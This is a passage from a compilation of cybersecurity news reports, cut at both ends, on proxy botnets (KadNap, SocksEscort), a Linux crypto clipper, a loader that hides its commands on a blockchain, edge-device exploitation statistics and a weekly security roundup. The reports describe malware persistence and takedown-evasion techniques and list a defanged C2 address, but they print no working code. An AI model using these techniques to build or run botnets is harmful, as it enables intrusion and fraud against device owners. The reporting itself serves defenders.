regular operations, routing communications through 15 command-and-control nodes (C2s). A Lumen spokesperson told BleepingComputer that SocksEscort used only the AVRecon malware to add new nodes. Since the beginning of 2025, the company has seen 280,000 unique victim IP addresses. The researchers believe that the AVRecon malware was used only for growing SocksEscort, as observed victim IPs were not seen in other botnets or services. Also, despite the significant size of the operation, the operators managed to keep the C2 infrastructure undetected. Over half of the infected devices were located in the United States and the United Kingdom, according to the researchers, which is excellent for routing malicious traffic and evading blocklists. Earlier this week, Black Lotus Labs revealed another proxying botnet called KadNap that targets ASUS routers and other edge networking devices primarily. Since August 2025, the botnet has infected 14,000 devices, using a novel but flawed communication and peer discovery mechanism based on the Kademlia Distributed Hash Table (DHT) protocol. Lumen took limited action against that botnet by blocking all network traffic to and from its C2 infrastructure on the Lumen network, preventing infected devices from communicating with the botnet controllers. To minimize the likelihood of router compromise, replace models that have reached end-of-life, apply the latest available firmware updates, change the default administrator password, and disable remote access panels if not needed. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMar 12, 2026extracted
KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet
Cybersecurity researchers have discovered a new malware called KadNap that's primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic. The malware, first detected in the wild in August 2025, has expanded to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. A lesser number of infections have been detected in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain. "KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring," the cybersecurity company said in a report shared with The Hacker News. Compromised nodes in the network leverage the DHT protocol to locate and connect with a command-and-control (C2) server, thereby making it resilient to detection and disruption efforts. Once devices are successfully compromised, they are marketed by a proxy service named Doppelgänger ("doppelganger[.]shop"), which is assessed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelgänger, according to its website, claims to offer resident proxies in over 50 countries that provide "100% anonymity." The service is said to have launched in May/June 2025. Despite the focus on Asus routers, the operators of KadNap have been found to deploy the malware against an assorted set of edge networking devices. Central to the attack is a shell script ("aic.sh") that's downloaded from the C2 server ("212.104.141[.]140"), which is responsible for initiating the process of conscripting the victim to the P2P network. The file creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to ".asusrouter," and run it. Once persistence is established, the script pulls a malicious ELF file, renames it to "kad," and executes it. This, in turn, leads to the deployment of KadNap. The malware is capable of targeting devices running both ARM and MIPS processors. KadNap is also designed to connect to a Network Time Protocol (NTP) server to fetch the current time and store it along with the host uptime. This information serves as a basis to create a hash that's used to locate other peers in the decentralized network to receive commands or download additional files. The files – "fwr.sh" and "/tmp/.sose" – contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and extract a list of C2 IP address:port combinations to connect to. "In short, the innovative use of the DHT protocol allows the malware to establish robust communication channels that are difficult to disrupt, by hiding in the noise of legitimate peer-to-peer traffic," Lumen said. Further analysis has determined that not all compromised devices communicate with every C2 server, indicating the infrastructure is being categorized based on device type and models. The Black Lotus Labs team told The Hacker News that Doppelgänger's bots are being abused by threat actors in the wild. "One issue there has been since these Asus (and other devices) are also sometimes co-infected with other malware, it is tricky to say who exactly is responsible for a specific malicious activity," the company said. Users running SOHO routers are advised to keep their devices up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and are no longer supported. "The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control," Lumen concluded. "Their intention is clear, avoid detection and make it difficult for defenders to protect against." New Linux Threat ClipXDaemon Emerges The disclosure comes as Cyble detailed a new Linux threat dubbed ClipXDaemon that's designed to target cryptocurrency users by intercepting and altering copied wallet addresses. The clipper malware, delivered via Linux post-exploitation framework called ShadowHS, has been described as an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments. Staged entirely in memory, the malware employs stealth techniques, such as process masquerading and Wayland session avoidance, while simultaneously monitoring the clipboard every 200 milliseconds and substituting cryptocurrency addresses with attacker-controlled wallets. It's capable of targeting Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets. The decision to avoid execution in Wayland sessions is deliberate, as the display server protocol's security architecture places additional controls, like requiring explicit user interaction, before applications can access the clipboard content. In disabling itself under such scenarios, the malware aims to eliminate noise and avoid runtime failure. "ClipXDaemon differs fundamentally from traditional Linux malware. It contains no command-and-control (C2) logic, performs no beaconing, and requires no remote tasking," the company said. "Instead, it monetizes victims directly by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them in real time with attacker-controlled addresses."
thehackernews.comMar 10, 2026extracted
New KadNap botnet hijacks ASUS routers to fuel cybercrime proxy network
A newly discovered botnet malware called KadNap is targeting ASUS routers and other edge networking devices to turn them into proxies for malicious traffic. Since August 2025, KadNap has grown to 14,000 devices that are part of a peer-to-peer network and connect to the command-and-control (C2) infrastructure through a custom version of the Kademlia Distributed Hash Table (DHT) protocol. This makes identifying and disrupting the C2 servers more difficult because the information is decentralized, and each node manages a subset of the complete data. According to researchers at Black Lotus Labs, the threat research and operations arm of Lumen Technologies, nearly half of the KadNap network is connected to C2 infrastructure dedicated to ASUS-based bots, and the rest communicate with two separate control servers. Most infected devices are located in the United States, which accounts for 60% of the total, followed by significant percentages in Taiwan, Hong Kong, and Russia. Kademlia-based communication A KadNap infection begins with downloading a malicious script (aic.sh) from 212.104.141[.]140, which establishes persistence via a cron job that runs every 55 minutes. The payload is an ELF binary named kad, which installs the KadNap client. Once active, the malware determines the host’s external IP address and contacts multiple Network Time Protocol (NTP) servers to obtain the current time and system uptime. For evasion and resistance to takedowns, KadNap uses a modified Kademlia-based DHT protocol to locate botnet nodes and the C2 infrastructure. “KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring,” the researchers explain. “Infected devices use the DHT protocol to locate and connect with a command-and-control (C2) server, while defenders cannot easily find and add those C2s to threat lists.” The researchers discovered that KanNap’s implementation of Kademlia is undermined by a consistent connection to two specific nodes, which occurs before reaching the C2 servers. This reduces the decentralization that the protocol could achieve in ideal cases and allows identifying the control infrastructure. Monetizing KadNap Black Lotus Labs researchers say that the KadNap botnet is linked to the Doppelganger proxy service, believed to be a rebrand of the Faceless service, previously associated with the TheMoon malware botnet, which also targeted ASUS routers. Doppelganger sells access to infected devices as residential proxies that can be used to funnel malicious traffic, create pseudonymization layers, and evade blocklists. As these services are typically used to launch distributed denial-of-service (DDoS), credential stuffing, and brute-force attacks, all leading initially to KadNap victims. Lumen has taken proactive measures against the KadNap botnet. The company says that at the time of publishing this article, it "blocked all network traffic to or from the control infrastructure." The disruption is only on Lumen's network, and a list of indicators of compromise will be released to help others disrupt the botnet on their end. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMar 10, 2026extracted
Week in review: Self-spreading npm malware hits developers, Cisco SD-WAN 0-day exploited since 2023
Week in review: Self-spreading npm malware hits developers, Cisco SD-WAN 0-day exploited since 2023 Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Identity verification systems are struggling with synthetic fraud Fake and expired IDs keep showing up in routine customer transactions, from alcohol purchases to credit card applications. The problem shows up most often in industries that depend on fast onboarding and remote transactions, where identity checks rely heavily on scanned documents and automated workflows. Enterprises are racing to secure agentic AI deployments AI assistants are tied into ticketing systems, source code repositories, chat platforms, and cloud dashboards across many enterprises. In some environments, these systems can open pull requests, query internal databases, book services, and trigger automated workflows with limited human involvement. The State of AI Security 2026 from Cisco places this level of access inside a growing pattern of AI-driven operations that connect directly to core business systems. The hidden security cost of treating labs like data centers In this Help Net Security interview, Rich Kellen, VP, CISO at IFF, explains why security teams should not treat OT labs like IT environments. He discusses how compromise can damage scientific integrity and create safety risks that backups cannot fix. AI is becoming part of everyday criminal workflows Underground forums include long threads about chatbots drafting phishing emails, generating code snippets, and coaching social engineering calls. A new study examined conversations captured between January 1, 2025 and July 31, 2025 across dozens of cybercrime forums to map how AI tools are entering day to day criminal operations. AI-driven DAST reduces manual setup and surfaces exploitable vulnerabilities In this Help Net Security interview, Joni Klippert, CEO at StackHawk, discusses what defines DAST coverage in 2026 and why scan completion does not equal security. She explains how AI-driven DAST testing automates attack surface discovery, supports business-logic testing in pre-production, and reduces the manual setup that has limited adoption. Klippert also describes how organizations can implement runtime testing without instrumenting production systems. Review: Digital Forensics, Investigation, and Response, 5th Edition Digital Forensics, Investigation, and Response, 5th Edition presents a structured survey of the digital forensics discipline. The book spans foundational principles, platform specific analysis, specialized branches, and incident response integration. Open-source security debt grows across commercial software Open source code sits inside nearly every commercial application, and development teams continue to add new dependencies. Black Duck’s 2026 Open Source Security and Risk Analysis Report data shows that nearly all audited codebases contain open source components, with average component counts rising sharply over the past year. The $19.5 million insider risk problem Routine employee activity across corporate systems carries an average annual cost of $19.5 million per organization. That figure comes from the 2026 Cost of Insider Risks Global Report, conducted by the Ponemon Institute and based on data from 354 organizations that experienced one or more material insider related incidents over the past year. Industrial networks continue to leak onto the internet Industrial operators continue to run remote access portals, building automation servers, and other operational technology services on public IP address ranges. Palo Alto Networks, Siemens, and Idaho National Laboratory describe the scope of that exposure in the Intelligence-Driven Active Defense Report 2026. DeVry University’s CISO on higher education cybersecurity risk In this Help Net Security interview, Fred Kwong, VP, CISO at DeVry University, outlines how the university balances academic openness with cyber risk. He describes how systems for students are separated from back end operations to limit exposure. Japanese chip-testing toolmaker Advantest suffers ransomware attack Japanese tech testing company Advantest has suffered a ransomware attack, the company confirmed last Thursday, after detecting unusual activity within its IT environment on February 15, 2026. Fake troubleshooting tip on ClawHub leads to infostealer infection A new malware delivery campaign has hit ClawHub, the official online repository for “skills” that augment the capabilities of the popular OpenClaw AI agent. Unlike previous ones, this campaign does not aim to trick users into downloading a bogus, malicious skill. Self-spreading npm malware targets developers in new supply chain attack Security researchers have uncovered another supply chain attack targeting developers: 19 typosquatting npm packages published on npmjs.com that steal credentials, infect projects, and propagate themselves across developer environments. CISA flags exploited FileZen command injection bug, patch now! (CVE-2026-25108) CISA has added CVE-2026-25108, an OS command injection vulnerability in Soliton Systems’ FileZen secure file transfer solution, to its Known Exploited Vulnerabilities (KEV) catalog. The vendor has confirmed active exploitation, stating it has received multiple reports of damage caused by attackers abusing the flaw. SolarWinds Serv-U hit by four critical RCE-level vulnerabilities SolarWinds has fixed four critical vulnerabilities in its popular Serv-U file transfer solution, which is used by businesses and organizations of all sizes. If exploited, the flaws may allow attackers to create a system admin user and/or execute code as a privileged account. Threat actor leveraged Cisco SD-WAN zero-day since 2023 (CVE-2026-20127) A “highly sophisticated” cyber threat actor has been exploiting a zero-day authentication bypass vulnerability (CVE-2026-20127) in Cisco Catalyst SD-WAN Controller (formerly vSmart) and Cisco Catalyst SD-WAN Manager (formerly SD-WAN vManage), Cisco has announced. Scattered Lapsus$ Hunters seeks women for vishing attacks The Scattered Lapsus$ Hunters (SLH) hacking collective has launched a recruitment push aimed specifically at women, offering cash payments for participating in voice-phishing (vishing) attacks. A few days ago, threat intelligence firm Dataminr detected posts on a public Telegram channel advertising roles for female callers willing to conduct social-engineering phone operations. IronCurtain: An open-source, safeguard layer for autonomous AI assistants Veteran security engineer Niels Provos is working on a new technical approach designed to stop autonomous AI agents from taking actions you haven’t specifically authorized. Why SOCs are moving toward autonomous security operations in 2026 The modern security operations center faces a crisis of scale that human effort cannot fix. With alert volumes exponentially growing and threat actors automating their attacks, organizations must pivot to autonomous SOC strategies. This shift to AI-driven defense is the only way to survive the operational realities of 2026. Binding Operational Directive 26-02 sets deadlines for edge device replacement In this Help Net Security video, Jen Sovada, General Manager, Public Sector at Claroty, explains CISA’s Binding Operational Directive 26-02 and what it means for federal agencies. The directive requires agencies to inventory, report, decommission, and replace unsupported edge devices such as firewalls, routers, switches, load balancers, and wireless access points. Police seize 100,000 stolen Facebook credentials in cybercrime raid Officers from Poland’s Central Bureau for Combating Cybercrime (CBZC) dismantled an organized group that used phishing to seize Facebook accounts and extract BLIK payment codes from victims. Spanish police arrest suspected Anonymous members over DDoS attacks on government sites Spanish police (Guardia Civil) arrested four members of the hacktivist group Anonymous Fénix over DDoS attacks targeting ministries, political parties and public institutions. Police identified the organization’s leadership, including its administrator and moderator, who were arrested in May 2025 in Alcalá de Henares (Madrid) and Oviedo (Asturias). Security and complexity slow the next phase of enterprise AI agent adoption Enterprise AI agents are embedded in routine business processes, particularly inside engineering and IT operations. Many organizations report active production deployments, and agent development ranks high on strategic agendas. A new study from Docker, The State of Agentic AI Report, examines how enterprises are deploying agentic systems and the challenges emerging as deployments scale. Microsoft extends security patching for three Windows products at a price Support is ending for three Windows products released in 2016, with deadlines beginning in October 2026. Windows 10 Enterprise LTSB 2016 and Windows 10 IoT Enterprise 2016 LTSB will reach end of support on October 13, 2026, followed by Windows Server 2016 on January 12, 2027. International operation dismantles fraud network, €400,000 seized A coordinated international operation supported by Eurojust dismantled a fraudulent call centre operating from three offices and targeting citizens throughout Europe. Authorities arrested 11 suspects and seized more than €400,000 in cash. Teenagers charged over public bike service breach that exposed 4.62 million records Two South Korean teenagers have been charged in connection with a cyberattack that compromised the personal data of 4.62 million users of Seoul’s public bike service, Ttareungyi. The compromised data included user IDs, mobile phone numbers, addresses, dates of birth, gender, and weight. Airline brands become launchpads for phishing, crypto fraud Airline brands sit at the center of peak travel booking cycles, loyalty programs, and high value transactions. Criminal groups continue to register thousands of lookalike domains tied to these brands, targeting travelers, employees, and business partners. Recent threat intelligence from BforeAI’s PreCrime Labs identifies sustained impersonation activity across the global commercial airline sector. Cyber valuations climb as capital concentrates, AI security expands Venture funding in cybersecurity continued to concentrate in large private rounds at the end of 2025, driving valuations higher across stages. Data from DataTribe shows total capital invested approached $150 billion for the year, with a disproportionate share flowing into fewer than 100 deals. Ex-L3Harris executive sentenced to 87 months for selling stolen cyber-exploit trade secrets Peter Williams, a former executive of Trenchant, L3Harris’ cyber division, has been sentenced to 87 months in prison by a federal judge in Washington, D.C., after pleading guilty to stealing and selling sensitive cyber-exploit trade secrets to a Russian broker. Anthropic’s Remote Control feature brings Claude Code to mobile devices Anthropic has introduced a new Claude Code feature called Remote Control, allowing developers to continue a local coding session from a phone, tablet, or any web browser. The feature is rolling out as a research preview to Max users. Samsung’s Galaxy S26 turns privacy into a visible and invisible feature The Samsung Galaxy S26 series is out, offering plenty of security features that protect personal data while providing users with transparency and control over how their information is used. The feature that grabbed the spotlight is the built-in Privacy Display on the Galaxy S26 Ultra model, designed to help keep on-screen activity out of view in public places. Telegram rises to top spot in job scam activity Encrypted messaging platforms are becoming a primary channel for Authorised Push Payment (APP) fraud, with Telegram representing a growing share of reported cases, according to the Revolut report. NATO greenlights iPhone and iPad for classified information handling Apple confirmed that the iPhone and iPad have been approved for use with classified information in NATO restricted environments. The devices will no longer require special software or settings to handle NATO restricted-level information. Microsoft taps ASUS and Dell for the Windows 365 Cloud PC strategy Microsoft is adding two new Windows 365 Cloud PC devices, the ASUS NUC 16 for Windows 365 and the Dell Pro Desktop for Windows 365, expanding hardware options for its cloud-based desktop service. Both devices are scheduled for release in the third quarter of 2026, with distribution varying by region and model. Meta tightens grip on scam advertisers Meta is stepping up the fight against scams on its platforms by filing multiple lawsuits targeting companies and individuals in Brazil, China, and Vietnam who used deceptive tactics to run scam ads. The company said it has taken technical enforcement actions in these cases, including suspending payment methods used in the scams, disabling accounts linked to those operations, and blocking domains associated with scam sites. Coroot: Open-source observability and APM tool Coroot is an open-source observability and application performance monitoring tool. The core software, published in Go and accompanied by companion repositories such as coroot-node-agent, focuses on collecting telemetry data across systems. It uses extended Berkeley Packet Filter (eBPF) technology to gather metrics and trace inter-service communications without manual instrumentation of application code. Perplexity AI lands on Samsung’s next Galaxy lineup Samsung will add Perplexity to its upcoming Galaxy S26 devices as part of its Galaxy AI multi-agent ecosystem expansion. Users will be able to access Perplexity through quick-access controls, such as pressing and holding the side button, or by using the voice wake phrase “Hey, Plex.” WhatsApp is adding another lock to your account Meta has released WhatsApp Beta for Android 2.26.7.8 through the Google Play Beta Program. The update includes references to password-protected accounts, indicating plans to introduce an additional layer of protection beyond the app’s current authentication options. Windows 365 for Agents brings managed cloud PCs to autonomous workflows Microsoft’s Windows 365 for Agents is a cloud platform that gives AI agents secure access to cloud PCs. It lets builders run copilots, agents, and automated workflows in Windows environments without managing infrastructure. The platform includes security, policy controls, scalability, and visibility so agents can browse websites, process data, and complete tasks inside a managed cloud PC. Microsoft expands Sovereign Cloud security with governance, local productivity and AI Microsoft expands Microsoft Sovereign Cloud with new disconnected and AI capabilities that help organizations run critical infrastructure, productivity services and large AI models inside sovereign boundaries while keeping governance and operational continuity across connected and disconnected environments. Edge systems take the brunt of internet-wide exploitation attempts Internet-facing VPNs, routers, and remote access services absorbed sustained exploitation attempts throughout the second half of 2025, with nearly 3 billion malicious sessions recorded over 162 days. The concentration on edge infrastructure aligns with how attackers pursue initial access across the public internet. Microsoft adds domain libraries and Copilot integration to the quantum development kit The Microsoft Quantum Development Kit (QDK) is an open-source toolkit that runs on laptops and in common development environments. It includes code, simulators, libraries, and workflows that work with Visual Studio Code and GitHub Copilot. Integration with these tools gives developers features for writing, testing, debugging, and submitting quantum code. Apple blocks 18+ app downloads in select markets Apple has introduced expanded age assurance tools to help developers comply with regulations taking effect in Brazil, Australia, Singapore, Utah, and Louisiana. The updates, available in beta, expand the Declared Age Range API and related App Store systems. Reddit fined $19.5 million for failing to protect children’s personal data The UK’s Information Commissioner’s Office (ICO) has fined Reddit $19.5 million after finding that the company failed to use children’s personal information lawfully, exposing them to inappropriate and harmful content. Hottest cybersecurity open-source tools of the month: February 2026 This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. Wireshark 4.6.4 resolves dissector flaws, plugin compatibility issue Packet inspection remains a routine activity across enterprise networks, incident response workflows, and malware investigations. Continuous use places long-term stability and parsing accuracy at the center of daily operations. Wireshark version 4.6.4 addresses two vulnerabilities affecting protocol dissectors and resolves a plugin compatibility issue within the 4.6 release series. Fraudsters integrate ChatGPT into global scam campaigns AI models are being folded into fraud and influence operations that follow long standing tactics. A February 2026 update to OpenAI’s Disrupting Malicious Uses of Our Models report details how ChatGPT and related API access were used in romance scams, fake legal services, coordinated influence campaigns, and a state linked harassment effort. AWS Security Hub Extended brings enterprise security under one roof AWS Security Hub Extended is a plan within Security Hub that simplifies how customers procure, deploy, and integrate a full-stack enterprise security solution across endpoint, identity, email, network, data, browser, cloud, AI, and security operations. The CISO role keeps getting heavier Personal liability is becoming a routine part of the CISO job. In Splunk’s 2026 CISO Report, titled From Risk to Resilience in the AI Era, 78% of CISOs said they are concerned about their own liability for security incidents, up from 56% last year. The role carries personal exposure alongside operational accountability, and that shift is influencing how security leaders approach risk, documentation, and board communication. Android app uses Bluetooth signals to detect nearby smart glasses Smart glasses with built-in cameras are showing up in more public spaces, and a growing number of people want a way to know when one is nearby. An Android app called Nearby Glasses, developed by Yves Jeanrenaud, attempts to fill that gap by scanning Bluetooth Low Energy traffic for manufacturer identifiers associated with known smart glasses makers. Ransomware activity peaks outside business hours Intrusions continue to center on credential access and timed execution outside standard business hours. The Sophos Active Adversary Report 2026 analyzes 661 incident response and managed detection and response cases handled between November 1, 2024 and October 31, 2025, spanning organizations in 70 countries. Android 17 second beta expands privacy controls for contacts, SMS and local networks Google’s second beta of Android 17 continues updates to platform behavior and introduces new APIs focused on protecting sensitive data. Europol goes after The Com’s ransomware and extortion networks Law enforcement agencies across 28 countries have spent the past year building cases against a loosely organized collective known as The Com, a decentralized network of mostly teenagers and young adults linked to high-profile ransomware attacks, financial extortion, and the coercion of vulnerable children. Cybersecurity jobs available right now: February 24, 2026 We’ve scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now. New infosec products of the month: February 2026 Here’s a look at the most interesting products from the past month, featuring releases from Aikido Security, Avast, Armis, Black Duck, Compliance Scorecard, Fingerprint, Gremlin, Impart Security, Portnox, Redpanda, Socure, SpecterOps, Veza, and Virtana.
helpnetsecurity.comMar 1, 2026extracted
Microsoft taps ASUS and Dell for the Windows 365 Cloud PC strategy
Microsoft taps ASUS and Dell for the Windows 365 Cloud PC strategy Microsoft is adding two new Windows 365 Cloud PC devices, the ASUS NUC 16 for Windows 365 and the Dell Pro Desktop for Windows 365, expanding hardware options for its cloud-based desktop service. Both devices are scheduled for release in the third quarter of 2026, with distribution varying by region and model. The two devices join Windows 365 Link, Microsoft’s first Cloud PC device, which launched in April 2025. Details for both products remain limited. Here’s what we know so far. The ASUS NUC 16 for Windows 365 is a 0.7-liter mini PC designed for flexible deployment, including mounting behind a display, with support for up to three monitors via HDMI and USB-C. The Dell Pro Desktop for Windows 365 is a compact, fanless system with multiple connectivity and mounting options, also supporting up to three displays. “All Cloud PC devices boot directly to Windows 365, enabling users to work securely on a familiar Windows desktop in the Microsoft Cloud with responsive, high-fidelity experiences. They are simple and familiar to manage using Microsoft Intune and come preinstalled with a small, locked-down operating system, Windows CPC, that receives automatic updates,” the company said in the blog post. Microsoft also announced updates to the Windows CPC operating system scheduled for the second quarter of 2026. The changes include support for pairing Bluetooth devices during the out-of-box setup process and tenant branding options such as custom wallpapers, logos and organization names on the sign-in screen.
helpnetsecurity.comFeb 27, 2026extracted
Aeternum C2 Botnet Stores Encrypted Commands on Polygon Blockchain to Evade Takedown
Cybersecurity researchers have disclosed details of a new botnet loader called Aeternum C2 that uses a blockchain-based command-and-control (C2) infrastructure to make it resilient to takedown efforts. "Instead of relying on traditional servers or domains for command-and-control, Aeternum stores its instructions on the public Polygon blockchain," Qrator Labs said in a report shared with The Hacker News. "This network is widely used by decentralized applications, including Polymarket, the world's largest prediction market. This approach makes Aeternum's C2 infrastructure effectively permanent and resistant to traditional takedown methods." This is not the first time botnets have been found relying on blockchain for C2. In 2021, Google said it took steps to disrupt a botnet known as Glupteba that uses the Bitcoin blockchain as a backup C2 mechanism to fetch the actual C2 server address. Details of Aeternum C2 first emerged in December 2025, when Outpost24's KrakenLabs revealed that a threat actor by the name of LenAI was advertising the malware on underground forums. A $200 payment grants customers access to a panel and a configured build. For $4,000, customers were allegedly promised the entire C++ codebase along with updates. A native C++ loader available in both x32 and x64 builds, the malware works by writing commands to be issued to the infected host to smart contracts on the Polygon blockchain. The bots then read those commands by querying public remote procedure call (RPC) endpoints. All of this is managed via the web-based panel, from where customers can select a smart contract, choose a command type, specify a payload URL and update it. The command, which can target all endpoints or a specific one, is written into the blockchain as a transaction, after which it becomes available to every compromised device that's polling the network. "Once a command is confirmed, it cannot be altered or removed by anyone other than the wallet holder," Qrator Labs said. "The operator can manage multiple smart contracts simultaneously, each one potentially serving a different payload or function, such as a clipper, a stealer, a RAT, or a miner." According to a two-part research published by Ctrl Alt Intel earlier this month, the C2 panel is implemented as a Next.js web application that allows operators to deploy smart contracts to the Polygon blockchain. The smart contracts contain a function that, when called by the malware via the Polygon RPC, causes it to return the encrypted command that's subsequently decoded and run on the victim machines. Besides using the blockchain to turn it into a takedown-resistant botnet, the malware packs in various anti-analysis features to extend the lifespan of infections. This includes checks to detect virtualized environments, in addition to equipping customers with the ability to scan their builds via Kleenscan to ensure that they are not flagged by antivirus vendors. "The operational costs are negligible: $1 worth of MATIC, the native token of the Polygon network, is enough for 100 to 150 command transactions," the Czechian cybersecurity vendor said. "The operator doesn't need to rent servers, register domains, or maintain any infrastructure beyond a crypto wallet and a local copy of the panel." The threat actor has since attempted to sell the entire toolkit for an asking price of $10,000, claiming a lack of time for support and their involvement in another project. "I will sell the entire project to one person with permission for resale and commercial use, with all 'rights,'" LenAI wrote in a dark web forum post. "I will also give useful tips/notes on development that I did not have time to implement." It's worth noting that LenAI is also behind a second crimeware solution called ErrTraffic that enables threat actors to automate ClickFix attacks by generating fake glitches on compromised websites to induce a false sense of urgency and deceive users into following malicious instructions. The disclosure comes as Infrawatch published details of an underground service that deploys dedicated laptop hardware into American homes to co-opt the devices into a residential proxy network named DSLRoot that redirects malicious traffic through them. The hardware is designed to run a Delphi-based program called DSLPylon that's equipped with capabilities to enumerate supported modems on the network, as well as remotely control the residential networking equipment and Android devices via an Android Debug Bridge (ADB) integration. "Attribution analysis identifies the operator as a Belarusian national with residential presence in Minsk and Moscow," Infrawatch said. "DSLRoot is estimated to operate roughly 300 active hardware devices across 20+ U.S. states." The operator has been identified as Andrei Holas (aka Andre Holas and Andrei Golas), with the service promoted on BlackHatWorld by a user operating under the alias GlobalSolutions, claiming to offer physical residential ADSL proxies for sale for $190 per month for unrestricted access. It is also available for $990 for six months and $1,750 for annual subscriptions. "DSLRoot's custom software provides automated remote management of consumer modems (ARRIS/Motorola, Belkin, D-Link, ASUS) and Android devices via ADB, enabling IP address rotation and connectivity control," the company noted. "The network operates without authentication, allowing clients to route traffic anonymously through U.S. residential IPs."
thehackernews.comFeb 26, 2026extracted
Edge systems take the brunt of internet-wide exploitation attempts
Edge systems take the brunt of internet-wide exploitation attempts Internet-facing VPNs, routers, and remote access services absorbed sustained exploitation attempts throughout the second half of 2025, with nearly 3 billion malicious sessions recorded over 162 days. The concentration on edge infrastructure aligns with how attackers pursue initial access across the public internet. GreyNoise’s State of the Edge data set covers 2.97 billion sessions observed between July 23 and December 31, 2025, across sensors in more than 80 countries. Activity averaged roughly 212 malicious sessions per second during that period. Edge infrastructure dominates targeting VPN appliances, consumer routers, and remote access services accounted for a large share of observed exploitation traffic. Enterprise VPN platforms, including Palo Alto Networks, Cisco, and Fortinet, generated millions of sessions. Consumer routers such as MikroTik and ASUS devices also saw sustained probing, alongside heavy activity against Remote Desktop services. SSH activity dwarfed every other protocol. Port 22 alone generated more than 639 million sessions during the observation period. Router management interfaces also drew sustained attention, including tens of millions of sessions against MikroTik services. Palo Alto GlobalProtect emerged as a primary target. Sensors recorded 16.7 million sessions directed at Palo Alto infrastructure, exceeding Cisco and Fortinet SSL VPN traffic combined. Activity included large-scale login scanning and exploitation attempts against CVE-2020-2034, a PAN-OS injection flaw that remains in circulation. The volume and focus show deliberate targeting of systems that sit at the network boundary. VPN compromise provides direct network access, placing edge devices at the center of internet-wide exploitation activity. Infrastructure concentration creates blocking opportunities Malicious traffic clustered heavily around a small number of hosting providers. UCLOUD, ASN AS135377, generated 392 million malicious sessions, representing 14% of all observed activity. That volume exceeded AWS and Azure combined. The top five autonomous systems accounted for roughly 30% of all malicious sessions. Concentration at the ASN level enables coarse-grained blocking during active campaigns. Exploitation of CVE-2025-55182, a React Server Components remote code execution flaw, showed similar clustering. Of 5.93 million sessions tied to that vulnerability, 44.5% originated from MEVSPACE, ASN AS201814. Two JA4H fingerprints accounted for 73% of traffic, indicating shared tooling across thousands of IP addresses. Residential botnet growth bypasses source-based controls Credential spraying against U.S. Remote Desktop services expanded from 2,000 to 300,000 participating IP addresses over 72 days. 73% of those IPs were classified as residential, largely in Brazil and Argentina. The campaign relied on geographically distributed home and small business connections. Many IPs carried no prior malicious history. Traffic exhibited consistent client signatures across thousands of sources, indicating centralized coordination. This scale reduces the effectiveness of geographic blocking, reputation scoring, and static IP blocklists. Each source can generate minimal traffic, spreading credential attempts across hundreds of thousands of nodes. Fresh infrastructure supports high-severity attacks Higher-impact exploitation attempts frequently originated from infrastructure with no prior history in the sensor data set. More than half of remote code execution traffic came from previously unseen IP addresses. SQL injection and authentication bypass activity showed a similar pattern, with a substantial share of traffic sourced from new infrastructure. Lower-severity reconnaissance activity relied more heavily on known infrastructure. The distribution points to routine infrastructure rotation for attacks designed to achieve code execution or bypass authentication controls. AI infrastructure joins the edge attack surface LLM inference servers have entered routine scanning cycles. Tens of thousands of sessions targeted Ollama servers over a four-month period, including a concentrated enumeration campaign that probed dozens of model endpoints. Separate research identified roughly 175,000 exposed Ollama servers across more than 100 countries, with many advertising tool-calling features through public APIs.
helpnetsecurity.comFeb 25, 2026extracted
China Revives Tianfu Cup Hacking Contest Under Increased Secrecy
China’s Tianfu Cup hacking contest made its return in 2026, now overseen by the government and marked by limited transparency. Tianfu Cup was launched as an alternative to the Zero Day Initiative’s Pwn2Own competition, which regularly pays out more than $1 million to white hat hackers who demonstrate critical vulnerabilities in consumer and enterprise hardware and software, industrial control systems, and automotive products. Tianfu Cup made headlines in 2021, when participants earned a total of $1.9 million for exploits targeting Windows, Ubuntu, iOS, Microsoft Exchange, Chrome, Safari, Adobe Reader, Asus routers, and various virtualization products. The hacking competition took a break in 2022 and returned in 2023 with a focus on domestic products from companies such as Huawei, Xiaomi, Tencent, and Qihoo 360. Little information was provided about the results of the 2023 event. After a two-year hiatus in 2024 and 2025, the Tianfu Cup returned in 2026, but again little information has been made public. The event took place January 29-30. According to threat intelligence firm Natto Thoughts, the hacking competition is now organized by China’s Ministry of Public Security (MPS) and it appears to be even more secretive. Eugenio Benincasa, an ETH Zurich cybersecurity researcher focusing on China, pointed out in a Natto Thoughts blog post that the MPS announced the Tianfu Cup on January 16. A few days later, a post announcing the event was also published on Tianfu Cup’s X account, but it was quickly removed. A day later, the competition’s official website became inaccessible to visitors from outside of China, and after the event ended the website was completely taken offline. Tianfu Cup targets Natto Thoughts obtained the list of Tianfu Cup targets before the site was taken down. It included smartphones such as the iPhone 17, Xiaomi 14 Ultra, Honor Magic 7 Pro, Samsung Galaxy S24 Ultra, Google Pixel 9 Pro XL, Vivo X300, and Oppo Find X9 Pro. A translation of the requirements for hacking these devices reads, “Ability to achieve remote code execution, sandbox escape, kernel privilege escalation, and local kernel privilege escalation on the competition device, thereby obtaining 